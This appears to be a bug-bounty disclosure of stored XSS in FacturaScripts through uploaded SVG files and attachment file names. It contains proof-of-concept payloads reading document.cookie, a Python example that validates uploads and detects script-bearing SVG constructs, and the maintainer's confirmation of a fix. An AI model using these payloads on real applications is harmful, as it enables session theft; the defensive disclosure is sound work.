Multiple Stored XSS via uploaded SVG file and attachment file name in neorazorx/facturascripts

Valid

Reported on

Apr 27th 2022


Description

Hi there, facturascripts is vulnerable to stored XSS via an uploaded SVG file and via the attachment file name.

Steps to reproduce with an SVG file

Log in as admin, or as any account that has the Admin -> Library role, go to Admin -> Library -> New and upload an SVG file with this content:

<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">

<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
   <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
   <script type="text/javascript">
      alert(document.cookie);
   </script>
</svg>

Save it. The XSS triggers when the file is downloaded: the browser renders the SVG as a document and executes the embedded script.


Steps to reproduce with a file name payload:

Upload any file with the file name: %22><img src=x onerror=alert(document.cookie).xlsx. The XSS triggers wherever the file name is rendered into the page without escaping.
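As an added example, not part of this report and not FacturaScripts code (the project is PHP; this is stand-alone Python so it runs as is), here are the server-side checks that close both vectors above: an uploaded SVG is rejected if it carries script, event-handler attributes, javascript:/data: links or a DTD entity declaration; the file name is percent-decoded, reduced to a safe basename with an allow-listed extension, and HTML-escaped before display; and attachments are served with headers that force a download and block script even if the SVG is rendered. The function names, the extension allow-list and the sample inputs are assumptions made for the example; the SVG and the file-name payload are the ones from the report.

```python
# Added example (not FacturaScripts code): server-side checks for the two
# stored-XSS vectors in this report. Function names, the extension allow-list
# and the sample inputs are assumptions made for the example.
from __future__ import annotations

import html
import re
import xml.etree.ElementTree as ET
from urllib.parse import unquote

# SVG elements that run script or embed foreign content.
ACTIVE_TAGS = {"script", "foreignobject", "handler", "iframe", "embed", "object"}
# Extensions the example is willing to store (assumption).
ALLOWED_EXT = {"pdf", "png", "jpg", "jpeg", "gif", "csv", "txt", "xlsx", "svg"}


def _local(qname: str) -> str:
    """Strip the namespace: '{http://www.w3.org/2000/svg}script' -> 'script'."""
    return qname.rsplit("}", 1)[-1].lower()


def svg_active_content(data: bytes) -> list[str]:
    """Return the reasons an SVG must not be served; an empty list means clean.
    Anything that does not parse is reported too, so it is rejected rather than
    left for a lenient browser to make sense of."""
    if b"<!ENTITY" in data:
        # An internal DTD subset enables entity-expansion attacks; no icon needs one.
        return ["internal DTD entity declaration"]
    try:
        root = ET.fromstring(data)
    except ET.ParseError as exc:
        return [f"unparseable XML: {exc}"]
    findings = []
    for elem in root.iter():
        tag = _local(elem.tag)
        if tag in ACTIVE_TAGS:
            findings.append(f"<{tag}> element")
        for attr, value in elem.attrib.items():
            name = _local(attr)
            if name.startswith("on"):  # onload, onerror, onclick, ...
                findings.append(f"{name} handler on <{tag}>")
            elif name == "href" and re.match(r"\s*(javascript|data)\s*:", value, re.I):
                findings.append(f"{value.split(':', 1)[0].strip().lower()}: URL on <{tag}>")
    return findings


def safe_filename(original: str) -> str:
    """Reduce an uploaded name to a basename of [A-Za-z0-9_-] plus an allow-listed
    extension. Percent-decoding first means '%22' cannot turn into '"' later."""
    name = unquote(original).replace("\\", "/").rsplit("/", 1)[-1]
    stem, _, ext = name.rpartition(".")
    ext = ext.lower()
    if not stem or ext not in ALLOWED_EXT:
        raise ValueError(f"extension {ext!r} not allowed")
    stem = re.sub(r"[^A-Za-z0-9_-]+", "_", stem).strip("_")[:100] or "file"
    return f"{stem}.{ext}"


def display_name(stored_name: str) -> str:
    """Escape a file name for insertion into HTML (quotes included, so it is also
    safe inside attribute values)."""
    return html.escape(stored_name, quote=True)


def download_headers(stored_name: str, mime: str) -> dict[str, str]:
    """Headers for serving an attachment: forced download, no content sniffing,
    and a CSP so that even a rendered SVG cannot run script."""
    return {
        "Content-Type": mime,
        "Content-Disposition": f'attachment; filename="{stored_name}"',
        "X-Content-Type-Options": "nosniff",
        "Content-Security-Policy": "default-src 'none'; style-src 'unsafe-inline'; sandbox",
    }


def vet_upload(original_name: str, data: bytes) -> str:
    """Validate an upload; return the name to store it under or raise ValueError."""
    stored = safe_filename(original_name)
    if stored.endswith(".svg"):
        findings = svg_active_content(data)
        if findings:
            raise ValueError("SVG rejected: " + "; ".join(findings))
    return stored


# Constructed sample inputs: the SVG and the file-name payload from the report,
# plus a clean icon that should pass.
REPORT_SVG = b"""<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
   <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
   <script type="text/javascript">alert(document.cookie);</script>
</svg>"""
CLEAN_SVG = b'<svg xmlns="http://www.w3.org/2000/svg"><circle r="10" fill="#009900"/></svg>'
REPORT_NAME = "%22><img src=x onerror=alert(document.cookie).xlsx"

if __name__ == "__main__":
    for name, data in ((REPORT_NAME, b"x"), ("logo.svg", REPORT_SVG), ("logo.svg", CLEAN_SVG)):
        try:
            stored = vet_upload(name, data)
            print(f"accepted {name!r} as {stored!r}; display as {display_name(stored)!r}")
        except ValueError as exc:
            print(f"rejected {name!r}: {exc}")
```

Rejecting script-bearing SVGs at upload time is preferable to trying to strip them, since browsers also honour event-handler attributes and javascript: links, and a sanitizer that misses one construct leaves the same stored XSS in place. The download headers are the second layer: Content-Disposition: attachment keeps the browser from navigating to the file as a document, and the CSP sandbox directive neutralises script if it is rendered anyway.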

Impact

This vulnerability can be used to deface pages, compromise user accounts (the payloads above read document.cookie) and run attacker-controlled script in the context of the application, which can lead to a compromise of the user's device.

We are processing your report and will contact the neorazorx/facturascripts team within 24 hours. a month ago
minhnb modified the report
a month ago
minhnb modified the report
a month ago
We have contacted a member of the neorazorx/facturascripts team and are waiting to hear back a month ago
Carlos Garcia validated this vulnerability a month ago
minhnb has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
Carlos Garcia confirmed that a fix has been merged on 1d1edb a month ago
The fix bounty has been dropped
minhnb
a month ago

Researcher


Carlos Garcia
a month ago

Maintainer


You're right. I have corrected it in this commit https://github.com/NeoRazorX/facturascripts/commit/a5e64bb5f29367e072dfc984e775731c6b3dd8f4

Thank you so much for everything
